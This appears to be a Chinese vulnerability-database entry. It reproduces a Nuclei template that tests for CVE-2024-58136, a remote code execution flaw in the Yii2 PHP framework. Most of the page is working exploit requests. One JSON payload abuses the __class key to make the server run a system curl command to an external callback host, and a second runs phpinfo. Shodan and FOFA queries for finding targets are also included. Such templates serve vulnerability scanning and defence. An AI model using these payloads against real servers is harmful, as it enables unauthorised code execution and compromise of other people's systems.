CVE-2024-58136: Yii2 PHP Framework < 2.0.52 - Remote Code Execution

日期: 2025-08-01 | 影响软件: Yii2 PHP Framework | POC: 已公开

漏洞描述

Yii2 PHP Framework before 2.0.52 is vulnerable to remote code execution via improper validation of the __class key in JSON behaviors. An attacker can instantiate arbitrary PHP classes and achieve RCE.

PoC代码[已公开]

id: CVE-2024-58136

info:
  name: Yii2 PHP Framework < 2.0.52 - Remote Code Execution
  author: ritikchaddha
  severity: critical
  description: |
    Yii2 PHP Framework before 2.0.52 is vulnerable to remote code execution via improper validation of the __class key in JSON behaviors. An attacker can instantiate arbitrary PHP classes and achieve RCE.
  reference:
    - https://infosecwriteups.com/from-behaviors-to-shells-yii2-php-framework-rce-cve-2024-58136-exploit-and-mitigation-e47a60a3cecb
    - https://nvd.nist.gov/vuln/detail/CVE-2024-58136
  classification:
    epss-score: 0.83062
    epss-percentile: 0.99219
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-58136
    cwe-id: CWE-94
    cpe: cpe:2.3:a:yiisoft:yii:2.0.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: yiisoft
    product: yii
    fofa-query: title="Yii"
    shodan-query: title:"Yii"
  tags: cve,cve2024,yii2,rce,php,framework,kev,vkev

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    redirects: true
    matchers:
      - type: word
        words:
          - "Yii"
        internal: true

  - raw:
      - |
        POST /index.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"as hack": {"__class": "GuzzleHttp\\\\Psr7\\\\FnStream", "class": "yii\\\\behaviors\\\\AttributeBehavior", "__construct()": [[]], "_fn_close": "system", "stream":"curl {{interactsh-url}}"}}

      - |
        POST /index.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"as hack": {"__class": "GuzzleHttp\\\\Psr7\\\\FnStream", "class": "yii\\\\behaviors\\\\AttributeBehavior", "__construct()": [[]], "_fn_close": "phpinfo"}}

    matchers-condition: or
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        words:
          - "PHP Version"
          - "PHP Extension"
        condition: and
# digest: 4a0a00473045022100b55d59d0f4c7110174d65d83f0a5ede853bcb5fdfe2af27ee5f7682d6e902b1702201aa1f8efbcb587cfebeccb4e87db0482581d4ca448ab93e0788e687c9ecb18bb:922c64590222798bb761d5b6d8e72950

相关漏洞推荐